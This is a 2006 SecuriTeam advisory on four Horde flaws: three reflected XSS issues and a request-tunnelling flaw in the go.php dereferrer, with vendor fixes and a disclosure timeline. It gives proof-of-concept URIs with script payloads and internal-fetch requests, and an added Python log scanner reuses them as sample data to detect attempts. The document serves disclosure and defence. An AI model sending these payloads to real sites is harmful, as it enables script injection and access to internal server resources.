
| Subject: | [NT] Horde Multiple XSS |
|---|---|
| Date: | 6 Jul 2006 16:24:34 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Horde Multiple XSS
------------------------------------------------------------------------

SUMMARY

"The <http://www.horde.org/> Horde Project is about creating high quality Open Source applications, based on PHP and the Horde Framework."

Improper handling of user input allows attackers to execute XSS using Horde. Three service pages reflect a user-supplied parameter into their HTML output without sufficient validation, and the URL redirection (dereferrer) page can additionally be used to tunnel HTTP GET requests through the server.

DETAILS

Vulnerable Systems:
 * Horde version 3.0.0 through 3.0.10
 * Horde version 3.1.0 through 3.1.1

Issue 1: Horde is subject to a client side script injection vulnerability in the URL redirection (dereferrer) function. By accessing the following (partial) URI on a web site running an affected version with a web browser which is prone to this issue, client side script code will be injected into the output generated by the application:

[Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);

Issue 2: Horde is subject to a client side script injection vulnerability in the help function. By accessing the following (partial) URI on a web site running a vulnerable version with a web browser which is prone to this issue, client side script code will be injected into the output generated by the application:

[Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E

This problem is caused by insufficient validation of user supplied input. All common modern browsers providing Javascript support are assumed to be prone to this issue.

Issue 3: Horde is subject to a client side script injection vulnerability in the problem reporting function. By accessing the following (partial) URI on a web site running a vulnerable version with a web browser which is prone to this issue, client side script code will be injected into the output generated by the application:

[Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22

This problem is caused by insufficient validation of user supplied input. All common modern browsers providing Javascript support are assumed to be prone to this issue.

Issue 4: Horde is subject to a server side issue which allows HTTP GET requests to be tunnelled through the application and remotely hosted web script to be injected into the output generated by the application. This behaviour allows access to arbitrary locations which are addressable using URIs starting with the 'http://', 'https://' or 'ftp://' protocol handlers. These locations are accessed from within the security context of the web server running an affected version of the application. As a result, an attacker may be able to reach remote locations s/he would not otherwise have access to, without disclosing the real source of the request [1]. Additionally, insufficiently access-restricted local (server-side) or remote (3rd party) locations may become available [2]. By tricking a victim into starting a tunnelling call to a previously prepared malicious HTML file, stored in a remote location, which contains web script that may be executed on the client side, it is possible to extend this into a script injection issue. The injected script would be executed by the client within the context of the domain the vulnerable web application is hosted in [3]. All common modern browsers providing Javascript support are assumed to be prone to this issue.
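A detection check for the four issues above, as an added example that is not part of the advisory or the Horde project's code: it scans Apache combined-format access log lines for requests to the three affected pages whose reflected parameter carries markup or a script: pseudo-URL, and for dereferrer calls that tunnel a request to an absolute URL, separating internal targets (loopback, RFC 1918, link-local) from third-party hosts. The log format, the sample log lines, the path suffixes and the use of untrusted=1 as the tunnelling marker (taken from the proof-of-concept URIs) are assumptions made for the example.

```python
"""Scan web-server access logs for attempts on the four Horde issues in this advisory.

Added example, not code from the advisory or the Horde project. Assumes Apache
"combined" log format; the sample lines below are constructed for illustration
and re-use the advisory's proof-of-concept URIs.
"""
import ipaddress
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Apache combined format: client ident user [time] "method target protocol" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Affected pages (matched by path suffix so any [Base_URI] works) and the
# parameter each one reflects into its HTML output (assumed from the advisory).
WATCHED = {
    "/services/go.php": "url",
    "/services/help/": "module",
    "/services/problem.php": "name",
}
SCRIPT_SCHEMES = ("javascript:", "vbscript:")


def _query_params(query):
    """Split a query string on '&' only; the PoC payloads contain literal ';'."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def _is_internal_host(host):
    """True for loopback, RFC 1918 and link-local targets (the server-status PoC)."""
    if host in ("localhost", "localhost.localdomain"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name: treated as external, no resolution attempted here
    return ip.is_loopback or ip.is_private or ip.is_link_local


def classify_request(target):
    """Return finding tags for one request target (path plus query), or [] if benign."""
    try:
        parts = urlsplit(target)
    except ValueError:
        return []  # unparsable target (e.g. unbalanced IPv6 brackets)
    param = next((p for suffix, p in WATCHED.items() if parts.path.endswith(suffix)), None)
    if param is None:
        return []
    qs = _query_params(parts.query)
    # Decode a second time so a double-encoded '<' (%253C) is caught as well.
    values = [unquote(v) for v in qs.get(param, [])]
    findings = []
    for v in values:
        if "<" in v or any(s in v.lower() for s in SCRIPT_SCHEMES):
            findings.append("xss:" + param)
    # Issue 4: dereferrer used with untrusted=1 (the PoC's marker) to fetch an absolute URL.
    if parts.path.endswith("/services/go.php") and qs.get("untrusted") == ["1"]:
        for v in values:
            try:
                host = urlsplit(v).hostname  # None for relative and javascript: values
            except ValueError:
                continue
            if host:
                kind = "tunnel-internal" if _is_internal_host(host) else "tunnel-external"
                findings.append(kind + ":" + host)
    return findings


def scan_log(lines):
    """Return (client, target, findings) for every logged request that triggers a finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("src"), m.group("target"), findings))
    return hits


# Constructed sample log: five exploitation attempts followed by two ordinary requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Jul/2006:10:01:02 +0200] "GET /horde/services/go.php?url=http://./;URL=javascript:alert(0); HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/Jul/2006:10:01:05 +0200] "GET /horde/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/Jul/2006:10:01:09 +0200] "GET /horde/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22 HTTP/1.1" 200 3072 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/Jul/2006:10:02:11 +0200] "GET /horde/services/go.php?untrusted=1&url=http://localhost/server-status HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/Jul/2006:10:02:40 +0200] "GET /horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [06/Jul/2006:10:03:00 +0200] "GET /horde/services/go.php?url=http://www.horde.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [06/Jul/2006:10:03:30 +0200] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, target, findings in scan_log(SAMPLE_LOG):
        print(client, ",".join(findings), target)
```

The query string is split on '&' only, because the dereferrer and help payloads contain literal semicolons and a parser that also splits on ';' would truncate the value before the injected script. A go.php request without untrusted=1 and with a plain http:// destination (the second-to-last sample line) is reported as clean, so the check separates ordinary redirects from the tunnelling and injection cases.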
Proof of Concept:
By accessing the following (partial) URIs on a web site running a vulnerable version with a web browser, the behaviours described above may be triggered:

[1] [Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/
[2] [Base_URI]/horde/services/go.php?untrusted=1&url=http://localhost/server-status
[3] [Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html

Workaround:
Issues 1-3: Client: Disable Javascript. Server: Prevent access to vulnerable file(s).
Issue 4: Client: Use application as intended only. Server: Prevent access to vulnerable file(s).

Disabling Javascript on the client only blocks the script injection variants; the request tunnelling of issue 4 takes place on the server regardless of client settings, so only the server-side measure or the vendor fix addresses it.

Vendor Status:
The Horde project has released versions 3.0.11 and 3.1.2. These are supposed to fix all of the above issues. The updated packages are available at http://horde.org/

Disclosure Timeline:
Jun 06, 2006 Issues 1-4: Discovery, code maintainer notification
Jun 06, 2006 Issues 1-4: Code maintainer acknowledgement
Jul 05, 2006 Issues 1-4: Code maintainer provides fix publicly
Jul 05, 2006 Issues 1-4: Public advisory

ADDITIONAL INFORMATION

The information has been provided by moritz-naumann <security@moritz-naumann.com>.
The original article can be found at: http://moritz-naumann.com/adv/0011/hordemulti/0011.txt
The vendor response can be found at: http://lists.horde.org/archives/announce/2006/000288.html, http://lists.horde.org/archives/announce/2006/000287.html

========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
========================================
DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.